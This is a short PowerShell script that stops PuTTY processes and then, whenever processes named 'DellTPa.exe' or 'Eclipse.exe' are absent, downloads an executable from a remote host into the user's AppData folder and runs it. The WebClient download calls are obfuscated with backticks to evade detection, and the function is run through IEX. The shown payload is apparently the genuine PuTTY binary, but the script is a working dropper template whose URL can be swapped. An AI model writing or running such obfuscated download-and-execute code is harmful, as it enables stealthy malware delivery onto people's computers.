Stop-Process -Name "putty"
Stop-Process -Name "putty"

Function dwn
{
	
  $running = Get-Process DellTPa.exe -ErrorAction SilentlyContinue
   
    if (!$running)
    {
        
		(New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe', "C:\Users\$env:UserName\AppData\Local\Programs\Common\putty.exe");[System.Diagnostics.Process]::Start("C:\Users\$env:UserName\AppData\Local\Programs\Common\putty.exe");
	
	}
		
	 $running1 = Get-Process Eclipse.exe -ErrorAction SilentlyContinue
	 if (!$running1)
	
	 {
		 
(New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe', "C:\Users\$env:UserName\AppData\Local\Programs\Common\putty.exe");[System.Diagnostics.Process]::Start("C:\Users\$env:UserName\AppData\Local\Programs\Common\putty.exe");

		}
		
}


IEX dwn

